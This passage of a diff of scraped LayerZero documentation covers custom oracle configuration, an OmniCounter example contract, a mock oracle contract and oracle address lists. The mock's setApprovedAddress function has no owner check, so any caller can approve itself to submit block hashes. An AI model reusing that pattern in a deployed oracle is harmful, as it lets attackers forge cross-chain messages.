oracleAddress based on the contract's location. For instance, on OP Goerli, use the OP Goerli TSS Oracle Address and set the destination chain to 10121 for Goerli ETH. In Remix, passing these arguments will show the following: 3. Checking Oracle Configuration To ensure your Oracle setup is correctly configured: Navigate to the Block Explorer : Go to your chain's Endpoint Address on the designated block explorer. Access the Contract Details : Click on \"Read Contract\". Here, you should see an option labeled defaultReceiveLibraryAddress . Select it to navigate to LayerZero's UltraLightNode. Query the UltraLightNode Contract : getConfig : This returns the current configuration of your UA Contract. defaultAppConfig : This gives the default configuration based on the latest library version. To use this, you'll need to provide the _dstChainId parameter. View the Oracle Parameter For the defaultAppConfig , simply pass the _dstChainId and observe the returned oracle parameter. For the getConfig , pass the _dstChainId , your UA Contract Address, and set the constant CONFIG_TYPE_ORACLE to 6 . Compare Oracle Addresses : At the time of writing this tutorial, TSS is the default testnet Oracle. Therefore, if you haven't made any changes, both getConfig and defaultAppConfig should return identical Oracle addresses. However, if you've opted for a different Oracle from the current default, the two queries should return different Oracle addresses. Understanding Query Results: You might notice a difference in how the queries present the Oracle: defaultAppConfig : This query returns the Oracle as an address. getConfig : In contrast, this displays the Oracle as a bytes value. However, don't be alarmed by this variation. If the only discrepancy between the two results is the presence of '0' padding, then both queries are referencing the same Oracle. 4. Testing Message Delivery Validate your Oracle setup by calling incrementCounter . The protocol should now reflect your custom Oracle configuration and be capable to send messages in both directions. Congratulations on your successful configuration! A successful oracle configuration will not impact message delivery. Troubleshooting Encountering a FAILED message status on LayerZero Scan? This likely points to a misconfiguration of the oracle address on either one or both contracts. A failed oracle configuration will impact message delivery. Ensure you're using the local oracle address (i.e., the same chain as your UA) when invoking setConfig . Double-check the dstChainId you're passing. For further customization, refer to the UA Custom Configuration documentation. Previous Default Oracle Updates Next Develop an Oracle Last modified 9d ago", + "body": "Configuring Custom Oracle Learn how to seamlessly set up and integrate a new Oracle for your User Application (UA). This tutorial provides a step-by-step guide on setting a new Oracle for your User Application (UA). Understanding Oracle Configuration In LayerZero, Oracle configurations help enable smooth messaging across chain pathways. A chain pathway represents a connected route that utilizes both the Oracle and Relayer to facilitate message routing between blockchains. 1. Consistent Oracle Configuration: It's essential to ensure that the same Oracle provider is present on both the source and destination chains. This uniformity guarantees that messages can be reliably sent and received in both directions on the pathway. 2. Payment and Delivery Logic: If you're paying Oracle A on the source chain, you'd expect Oracle A to also handle the delivery on the destination chain. Hence, if Oracle A is available on both chains, it can be used in both directions. On the other hand, if Oracle A is only present on one chain, you'd need to opt for an alternative that's supported on both chain directions. Remember, the objective is to ensure that the Oracle setup supports the chain pathways, as they are the conduits for message routing. This is vital for efficient, error-free cross-chain communication. Prerequisites You should have an LZApp to start with that's already working with default settings. While we use OmniCounter in this tutorial, any app that inherits LZApp.sol (including the OFT and ONFT standards) can be used. In order to set a new Oracle, all a user will need to do is call the setConfig function on Chain A and Chain B. Below is a simple example for how to set your Oracle, using the Ethereum Goerli and Optimism Goerli Testnets. Example: Setting an Oracle using Ethereum Goerli and Optimism Goerli Testnets 1. Deploying OmniCounter After deploying OmniCounter on both Goerli and OP-Goerli, ensure that: You've correctly called setTrustedRemote . The incrementCounter function works by default on both contracts. // SPDX-License-Identifier: MIT pragma solidity ^ 0.8.0 ; pragma abicoder v2 ; import \"https://github.com/LayerZero-Labs/solidity-examples/blob/e43908440cefdcbc93cd8e0ea863326c4bd904eb/contracts/lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { bytes public constant PAYLOAD = \"\\x01\\x02\\x03\\x04\" ; uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { counter += 1 ; } function estimateFee ( uint16 _dstChainId , bool _useZro , bytes calldata _adapterParams ) public view returns ( uint nativeFee , uint zroFee ) { return lzEndpoint . estimateFees ( _dstChainId , address ( this ), PAYLOAD , _useZro , _adapterParams ); } function incrementCounter ( uint16 _dstChainId ) public payable { _lzSend ( _dstChainId , PAYLOAD , payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" ), msg . value ); } } 2. Setting a New Oracle To modify your UA contracts, you'll need to invoke the setConfig function. This can be done directly from a verified block explorer or using scripting tools. In this tutorial, we'll demonstrate using Remix. Here's how to set the Oracle for the Goerli OmniCounter using the Goerli TSS Oracle address, 0x36ebea3941907c438ca8ca2b1065deef21ccdaed : 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ \"0x36ebea3941907c438ca8ca2b1065deef21ccdaed\" ] // oracleAddress 4 ) 5 await lzEndpoint . setConfig ( 6 0 , // default library version 7 10132 , // dstChainId 8 6 , // CONFIG_TYPE_ORACLE 9 0x00000000000000000000000036ebea3941907c438ca8ca2b1065deef21ccdaed // config 10 ) This process should be repeated on both the source and destination contracts. Ensure you adjust the _dstChainId and oracleAddress based on the contract's location. For instance, on OP Goerli, use the OP Goerli TSS Oracle Address and set the destination chain to 10121 for Goerli ETH. In Remix, passing these arguments will show the following: 3. Checking Oracle Configuration To ensure your Oracle setup is correctly configured: Navigate to the Block Explorer : Go to your chain's Endpoint Address on the designated block explorer. Access the Contract Details : Click on \"Read Contract\". Here, you should see an option labeled defaultReceiveLibraryAddress . Select it to navigate to LayerZero's UltraLightNode. Query the UltraLightNode Contract : getConfig : This returns the current configuration of your UA Contract. defaultAppConfig : This gives the default configuration based on the latest library version. To use this, you'll need to provide the _dstChainId parameter. View the Oracle Parameter For the defaultAppConfig , simply pass the _dstChainId and observe the returned oracle parameter. For the getConfig , pass the _dstChainId , your UA Contract Address, and set the constant CONFIG_TYPE_ORACLE to 6 . Compare Oracle Addresses : At the time of writing this tutorial, TSS is the default testnet Oracle. Therefore, if you haven't made any changes, both getConfig and defaultAppConfig should return identical Oracle addresses. However, if you've opted for a different Oracle from the current default, the two queries should return different Oracle addresses. Understanding Query Results: You might notice a difference in how the queries present the Oracle: defaultAppConfig : This query returns the Oracle as an address. getConfig : In contrast, this displays the Oracle as a bytes value. However, don't be alarmed by this variation. If the only discrepancy between the two results is the presence of '0' padding, then both queries are referencing the same Oracle. 4. Testing Message Delivery Validate your Oracle setup by calling incrementCounter . The protocol should now reflect your custom Oracle configuration and be capable to send messages in both directions. Congratulations on your successful configuration! A successful oracle configuration will not impact message delivery. Troubleshooting Encountering a FAILED message status on LayerZero Scan? This likely points to a misconfiguration of the oracle address on either one or both contracts. A failed oracle configuration will impact message delivery. Ensure you're using the local oracle address (i.e., the same chain as your UA) when invoking setConfig . Double-check the dstChainId you're passing. For further customization, refer to the UA Custom Configuration documentation. Previous Default Oracle Updates Next Develop an Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1410,7 +1410,7 @@ { "title": "Default Oracle Updates", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/default-oracle-updates", - "body": "Default Oracle Updates Keep up to the date with the latest Oracle for Default User Applications (UAs). By default, UAs opt into the LayerZero Protocol library updates. These updates generally bring improvements and changes to the reliability of the protocol's generic messaging. These libraries are append-only, meaning that previous versions will always be available for UAs that decide to not use the default config. Opting Out of Defaults For UAs that want to fully control or lock their Oracle properties, see UA Custom Configuration to learn more. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e. best practice changes to block confirmations & proof libraries etc.) Projects with custom configuration will not have any impact on their settings, but are free to reconfigure settings back to Defaults or to any other Oracle at any given time. Google Cloud Oracle (default as of 9/19/23) Google Cloud (GCP) provides a Google Cloud Oracle to secure messaging in the LayerZero Protocol. The Google Cloud Oracle is the default Oracle for all dApps built using the LayerZero protocol. Enterprises and developers of all sizes can now rely on the combination of an established entity (GCP) and a leading Web3 company (LayerZero) to address their interoperability challenges. That said, each Oracle provides unique costs and benefits. UAs are encouraged to select the best Oracle that suits their needs. Ecosystem - Previous Oracle Next Configuring Custom Oracle Last modified 12d ago", + "body": "Default Oracle Updates Keep up to the date with the latest Oracle for Default User Applications (UAs). By default, UAs opt into the LayerZero Protocol library updates. These updates generally bring improvements and changes to the reliability of the protocol's generic messaging. These libraries are append-only, meaning that previous versions will always be available for UAs that decide to not use the default config. Opting Out of Defaults For UAs that want to fully control or lock their Oracle properties, see UA Custom Configuration to learn more. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e. best practice changes to block confirmations & proof libraries etc.) Projects with custom configuration will not have any impact on their settings, but are free to reconfigure settings back to Defaults or to any other Oracle at any given time. Google Cloud Oracle (default as of 9/19/23) Google Cloud (GCP) provides a Google Cloud Oracle to secure messaging in the LayerZero Protocol. The Google Cloud Oracle is the default Oracle for all dApps built using the LayerZero protocol. Enterprises and developers of all sizes can now rely on the combination of an established entity (GCP) and a leading Web3 company (LayerZero) to address their interoperability challenges. That said, each Oracle provides unique costs and benefits. UAs are encouraged to select the best Oracle that suits their needs. Ecosystem - Previous Oracle Next Configuring Custom Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1418,7 +1418,7 @@ { "title": "Develop an Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/develop-an-oracle", - "body": "Develop an Oracle Get paid to perform one of the roles in the LayerZero system. Oracle Specification Performing the job of an Oracle means moving a piece of the message data from one chain and storing it in another. Please refer to our Oracle Specification document to learn more. Two of the primary requirements for operating an Oracle (per-chain): Deploy and maintain balances in your own contract. Implement and operate a system that can submit data from Chain A to Chain B. In this gitbook, we wont get into the details of the implementation of an Oracle because the LayerZero relies on other ecosystem parters. We do however expose some example solidity contracts to demonstrate the contractual portion of a simple Oracle on an EVM: ILayerZeroOracle.sol See the LayerZero Oracle contract interface . LayerZeroOracleMock.sol Heres the Oracle we use for internal testing: // SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.7.6 ; import \"@openzeppelin/contracts/utils/ReentrancyGuard.sol\" ; import \"@openzeppelin/contracts/access/Ownable.sol\" ; import \"../interfaces/ILayerZeroOracle.sol\" ; import \"../interfaces/ILayerZeroUltraLightNodeV1.sol\" ; contract LayerZeroOracleMock is ILayerZeroOracle , Ownable , ReentrancyGuard { mapping ( address => bool ) public approvedAddresses ; mapping ( uint16 => mapping ( uint16 => uint )) public chainPriceLookup ; uint public fee ; ILayerZeroUltraLightNodeV1 public uln ; // ultraLightNode instance event OracleNotified ( uint16 dstChainId , uint16 _outboundProofType , uint blockConfirmations ); event Withdraw ( address to , uint amount ); constructor () { approvedAddresses [ msg . sender ] = true ; } function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external override { emit OracleNotified ( _dstChainId , _outboundProofType , _outboundBlockConfirmations ); } function updateHash ( uint16 _remoteChainId , bytes32 _blockHash , uint _confirmations , bytes32 _data ) external { require ( approvedAddresses [ msg . sender ], \"LayerZeroOracleMock: caller must be approved\" ); uln . updateHash ( _remoteChainId , _blockHash , _confirmations , _data ); } function withdraw ( address payable _to , uint _amount ) public onlyOwner nonReentrant { ( bool success , ) = _to . call { value : _amount }( \"\" ); require ( success , \"failed to withdraw\" ); emit Withdraw ( _to , _amount ); } // owner can set uln function setUln ( address ulnAddress ) external onlyOwner { uln = ILayerZeroUltraLightNodeV1 ( ulnAddress ); } // mock, doesnt do anything function setJob ( uint16 _chain , address _oracle , bytes32 _id , uint _fee ) public onlyOwner {} function setDeliveryAddress ( uint16 _dstChainId , address _deliveryAddress ) public onlyOwner {} function setPrice ( uint16 _destinationChainId , uint16 _outboundProofType , uint _price ) external onlyOwner { chainPriceLookup [ _outboundProofType ][ _destinationChainId ] = _price ; } function setApprovedAddress ( address _oracleAddress , bool _approve ) external { approvedAddresses [ _oracleAddress ] = _approve ; } function isApproved ( address _relayerAddress ) public view override returns ( bool ) { return approvedAddresses [ _relayerAddress ]; } function getPrice ( uint16 _destinationChainId , uint16 _outboundProofType ) external view override returns ( uint ) { return chainPriceLookup [ _outboundProofType ][ _destinationChainId ]; } fallback () external payable {} receive () external payable {} } Previous Configuring Custom Oracle Next Google Cloud Oracle Last modified 16d ago", + "body": "Develop an Oracle Get paid to perform one of the roles in the LayerZero system. Oracle Specification Performing the job of an Oracle means moving a piece of the message data from one chain and storing it in another. Please refer to our Oracle Specification document to learn more. Two of the primary requirements for operating an Oracle (per-chain): Deploy and maintain balances in your own contract. Implement and operate a system that can submit data from Chain A to Chain B. In this gitbook, we wont get into the details of the implementation of an Oracle because the LayerZero relies on other ecosystem parters. We do however expose some example solidity contracts to demonstrate the contractual portion of a simple Oracle on an EVM: ILayerZeroOracle.sol See the LayerZero Oracle contract interface . LayerZeroOracleMock.sol Heres the Oracle we use for internal testing: // SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.7.6 ; import \"@openzeppelin/contracts/utils/ReentrancyGuard.sol\" ; import \"@openzeppelin/contracts/access/Ownable.sol\" ; import \"../interfaces/ILayerZeroOracle.sol\" ; import \"../interfaces/ILayerZeroUltraLightNodeV1.sol\" ; contract LayerZeroOracleMock is ILayerZeroOracle , Ownable , ReentrancyGuard { mapping ( address => bool ) public approvedAddresses ; mapping ( uint16 => mapping ( uint16 => uint )) public chainPriceLookup ; uint public fee ; ILayerZeroUltraLightNodeV1 public uln ; // ultraLightNode instance event OracleNotified ( uint16 dstChainId , uint16 _outboundProofType , uint blockConfirmations ); event Withdraw ( address to , uint amount ); constructor () { approvedAddresses [ msg . sender ] = true ; } function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external override { emit OracleNotified ( _dstChainId , _outboundProofType , _outboundBlockConfirmations ); } function updateHash ( uint16 _remoteChainId , bytes32 _blockHash , uint _confirmations , bytes32 _data ) external { require ( approvedAddresses [ msg . sender ], \"LayerZeroOracleMock: caller must be approved\" ); uln . updateHash ( _remoteChainId , _blockHash , _confirmations , _data ); } function withdraw ( address payable _to , uint _amount ) public onlyOwner nonReentrant { ( bool success , ) = _to . call { value : _amount }( \"\" ); require ( success , \"failed to withdraw\" ); emit Withdraw ( _to , _amount ); } // owner can set uln function setUln ( address ulnAddress ) external onlyOwner { uln = ILayerZeroUltraLightNodeV1 ( ulnAddress ); } // mock, doesnt do anything function setJob ( uint16 _chain , address _oracle , bytes32 _id , uint _fee ) public onlyOwner {} function setDeliveryAddress ( uint16 _dstChainId , address _deliveryAddress ) public onlyOwner {} function setPrice ( uint16 _destinationChainId , uint16 _outboundProofType , uint _price ) external onlyOwner { chainPriceLookup [ _outboundProofType ][ _destinationChainId ] = _price ; } function setApprovedAddress ( address _oracleAddress , bool _approve ) external { approvedAddresses [ _oracleAddress ] = _approve ; } function isApproved ( address _relayerAddress ) public view override returns ( bool ) { return approvedAddresses [ _relayerAddress ]; } function getPrice ( uint16 _destinationChainId , uint16 _outboundProofType ) external view override returns ( uint ) { return chainPriceLookup [ _outboundProofType ][ _destinationChainId ]; } fallback () external payable {} receive () external payable {} } Previous Configuring Custom Oracle Next Google Cloud Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1426,7 +1426,7 @@ { "title": "Google Cloud Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/google-cloud-oracle", - "body": "Google Cloud Oracle Contract Addresses to use Google Oracle with LayerZero The Google Oracle, as of 9/19/23, is the default oracle configuration for LayerZero messaging. Mainnet Addresses Ethereum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc BNB: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Avalanche: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Polygon: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Optimism: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Fantom: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Gnosis: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Base: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Harmony: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Moonbeam: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Celo: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum Nova: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Linea: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Previous Develop an Oracle Next TSS Oracle Last modified 13d ago", + "body": "Google Cloud Oracle Contract Addresses to use Google Oracle with LayerZero The Google Oracle, as of 9/19/23, is the default oracle configuration for LayerZero messaging. Mainnet Addresses Ethereum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc BNB: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Avalanche: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Polygon: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Optimism: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Fantom: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Gnosis: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Base: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Harmony: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Moonbeam: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Celo: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Arbitrum Nova: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Linea: 0xD56e4eAb23cb81f43168F9F45211Eb027b9aC7cc Previous Develop an Oracle Next TSS Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1434,7 +1434,7 @@ { "title": "Overview of Polyhedra zkLightClient", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/overview-of-polyhedra-zklightclient", - "body": "Overview of Polyhedra zkLightClient Integration of zero-knowledge proof technology will enhance security, performance, and cost-efficiency for cross-chain interoperability on all chains supported by LayerZero Polyhedra Network is building the next generation of infrastructure for Web3 interoperability by leveraging advanced zero-knowledge proof (ZKP) technology, a fundamental cryptographic primitive that guarantees the validity of data and computations while maintaining data confidentiality. The Polyhedra Network team designed and developed Polyhedra zkLightClient technology, a cutting-edge solution built on LayerZero Protocol, providing secure and efficient cross-chain infrastructures for Layer-1 and Layer-2 interoperability. Previous Chainlink Oracle Next zkLightClient on LayerZero Last modified 16d ago", + "body": "Overview of Polyhedra zkLightClient Integration of zero-knowledge proof technology will enhance security, performance, and cost-efficiency for cross-chain interoperability on all chains supported by LayerZero Polyhedra Network is building the next generation of infrastructure for Web3 interoperability by leveraging advanced zero-knowledge proof (ZKP) technology, a fundamental cryptographic primitive that guarantees the validity of data and computations while maintaining data confidentiality. The Polyhedra Network team designed and developed Polyhedra zkLightClient technology, a cutting-edge solution built on LayerZero Protocol, providing secure and efficient cross-chain infrastructures for Layer-1 and Layer-2 interoperability. Previous Chainlink Oracle Next zkLightClient on LayerZero Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1442,7 +1442,7 @@ { "title": "TSS Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/tss-oracle", - "body": "TSS Oracle Contract Addresses to use TSS Oracle with LayerZero To use the TSS oracle with your LayerZero UserApplication, configure your app with the addresses below. TSS Oracle Mainnet Addresses Ethereum: 0x5a54fe5234e811466d5366846283323c954310b2 BNB: 0x5a54fe5234e811466d5366846283323c954310b2 Avalanche: 0x5a54fe5234e811466d5366846283323c954310b2 Polygon: 0x5a54fe5234e811466d5366846283323c954310b2 Arbitrum: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Optimism: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Fantom: 0xa0cc33dd6f4819d473226257792afe230ec3c67f DFK: 0x88bd5f18a13c22c41cf5c8cba12eb371c4bd18d9 Harmony: 0x3e2ef091d7606e4ca3b8d84bcaf23da0ffa11053 Moonbeam: 0xdeef80c12d49e5da8e01b05636e2d0c776f6b78d Celo: 0x071c3f1bc3046c693c3abbc03a87ca9a30e43be2 Dexalot: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Fuse: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Gnosis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Metis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Klaytn: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb CoreDAO: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb OKX (OKT): 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Goerli: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Dos: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Sepolia: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb zkSync: 0xcb7ad38d45ab5bcf5880b0fa851263c29582c18a Polygon zkEVM: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Moonriver: 0x84070061032f3e7ea4e068f447fb7cdfc98d57fe Shrapnel: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Tenet: 0x282b3386571f7f794450d5789911a9804FA346b4 Nova: 0x37aaaf95887624a363effB7762D489E3C05c2a02 Canto: 0x377530cdA84DFb2673bF4d145DCF0C4D7fdcB5b6 Meter: 0x51A6E62D12F2260E697039Ff53bCB102053f5ab7 Kava: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Base: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Linea: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Mantle: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Zora: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Telos: 0x4514FC667a944752ee8A29F544c1B20b1A315f25 Meritcircle: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Aptos: 0x12e12de0af996d9611b0b78928cd9f4cbf50d94d972043cdd829baa77a78929b TSS Oracle Testnet Addresses Ethereum: 0x36ebea3941907c438ca8ca2b1065deef21ccdaed BNB: 0x53ccb44479b2666cf93f5e815f75738aa5c6d3b9 Avalanche: 0x92cfdb3789693c2ae7225fcc2c263de94d630be4 Polygon: 0xaec5e56217a963bde38a3b6e0c3cb5e864450c86 Arbitrum: 0x9e13017d416cdf0816bccac744760dd1c374cd20 Optimism: 0x97597016f7dac89e55005105fc755c0513973fa8 Fantom: 0x9b743b9846230b657546fb942c6b11a23cfecd9a DFK: 0x7cfb4fadedc96793f844371d8498f4fdcd37da61 Dexalot: 0xab38efc6917086576137e4927af3a4d57da5f00c Moonbeam: 0xa85bfaa7bec20e014e5c29cb3536231116f3f789 Harmony: 0xb099d5a9652a80ff8f4234bde00f66531aa91c50 Celo: 0x894a918a9c2bfa6d32874e40ef4bba75b820b17c Fuse: 0x340b5e5e90a6d177e7614222081e0f9cdd54f25c Klaytn: 0xd682ecf100f6f4284138aa925348633b0611ae21 Metis: 0xd682ecf100f6f4284138aa925348633b0611ae21 CoreDAO: 0xb0487596a0b62d1a71d0c33294bd6eb635fc6b09 Gnosis: 0xd682ecf100f6f4284138aa925348633b0611ae21 zkSync: 0x2DCC8cFb612fDbC0Fb657eA1B51A6F77b8b86448 OKX (OKT): 0xd682ecf100f6f4284138aa925348633b0611ae21 Linea: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Base: 0x53fd4c4fbbd53f6bc58cae6704b92db1f360a648 Sepolia: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Meter: 0x0e8738298a8e437035e3aebd57f8dddc1a1bc44a Polygon zkEVM: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Kava: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tenet: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Canto: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Aptos: 0x47a30bcdb5b5bdbf6af883c7325827f3e40b3f52c3538e9e677e68cf0c0db060 Meritcircle: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Mantle: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Zora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Loot: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Telos: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tomo: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff opBNB: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Shimmer: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Aurora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Lif3: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Previous Google Cloud Oracle Next Chainlink Oracle Last modified 12d ago", + "body": "TSS Oracle Contract Addresses to use TSS Oracle with LayerZero To use the TSS oracle with your LayerZero UserApplication, configure your app with the addresses below. TSS Oracle Mainnet Addresses Ethereum: 0x5a54fe5234e811466d5366846283323c954310b2 BNB: 0x5a54fe5234e811466d5366846283323c954310b2 Avalanche: 0x5a54fe5234e811466d5366846283323c954310b2 Polygon: 0x5a54fe5234e811466d5366846283323c954310b2 Arbitrum: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Optimism: 0xa0cc33dd6f4819d473226257792afe230ec3c67f Fantom: 0xa0cc33dd6f4819d473226257792afe230ec3c67f DFK: 0x88bd5f18a13c22c41cf5c8cba12eb371c4bd18d9 Harmony: 0x3e2ef091d7606e4ca3b8d84bcaf23da0ffa11053 Moonbeam: 0xdeef80c12d49e5da8e01b05636e2d0c776f6b78d Celo: 0x071c3f1bc3046c693c3abbc03a87ca9a30e43be2 Dexalot: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Fuse: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Gnosis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Metis: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Klaytn: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb CoreDAO: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb OKX (OKT): 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Goerli: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Dos: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Sepolia: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb zkSync: 0xcb7ad38d45ab5bcf5880b0fa851263c29582c18a Polygon zkEVM: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Moonriver: 0x84070061032f3e7ea4e068f447fb7cdfc98d57fe Shrapnel: 0xa6bf2be6c60175601bf88217c75dd4b14abb5fbb Tenet: 0x282b3386571f7f794450d5789911a9804FA346b4 Nova: 0x37aaaf95887624a363effB7762D489E3C05c2a02 Canto: 0x377530cdA84DFb2673bF4d145DCF0C4D7fdcB5b6 Meter: 0x51A6E62D12F2260E697039Ff53bCB102053f5ab7 Kava: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Base: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Linea: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Mantle: 0xAaB5A48CFC03Efa9cC34A2C1aAcCCB84b4b770e4 Zora: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Telos: 0x4514FC667a944752ee8A29F544c1B20b1A315f25 Meritcircle: 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Aptos: 0x12e12de0af996d9611b0b78928cd9f4cbf50d94d972043cdd829baa77a78929b TSS Oracle Testnet Addresses Ethereum: 0x36ebea3941907c438ca8ca2b1065deef21ccdaed BNB: 0x53ccb44479b2666cf93f5e815f75738aa5c6d3b9 Avalanche: 0x92cfdb3789693c2ae7225fcc2c263de94d630be4 Polygon: 0xaec5e56217a963bde38a3b6e0c3cb5e864450c86 Arbitrum: 0x9e13017d416cdf0816bccac744760dd1c374cd20 Optimism: 0x97597016f7dac89e55005105fc755c0513973fa8 Fantom: 0x9b743b9846230b657546fb942c6b11a23cfecd9a DFK: 0x7cfb4fadedc96793f844371d8498f4fdcd37da61 Dexalot: 0xab38efc6917086576137e4927af3a4d57da5f00c Moonbeam: 0xa85bfaa7bec20e014e5c29cb3536231116f3f789 Harmony: 0xb099d5a9652a80ff8f4234bde00f66531aa91c50 Celo: 0x894a918a9c2bfa6d32874e40ef4bba75b820b17c Fuse: 0x340b5e5e90a6d177e7614222081e0f9cdd54f25c Klaytn: 0xd682ecf100f6f4284138aa925348633b0611ae21 Metis: 0xd682ecf100f6f4284138aa925348633b0611ae21 CoreDAO: 0xb0487596a0b62d1a71d0c33294bd6eb635fc6b09 Gnosis: 0xd682ecf100f6f4284138aa925348633b0611ae21 zkSync: 0x2DCC8cFb612fDbC0Fb657eA1B51A6F77b8b86448 OKX (OKT): 0xd682ecf100f6f4284138aa925348633b0611ae21 Linea: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Base: 0x53fd4c4fbbd53f6bc58cae6704b92db1f360a648 Sepolia: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Meter: 0x0e8738298a8e437035e3aebd57f8dddc1a1bc44a Polygon zkEVM: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Kava: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tenet: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Canto: 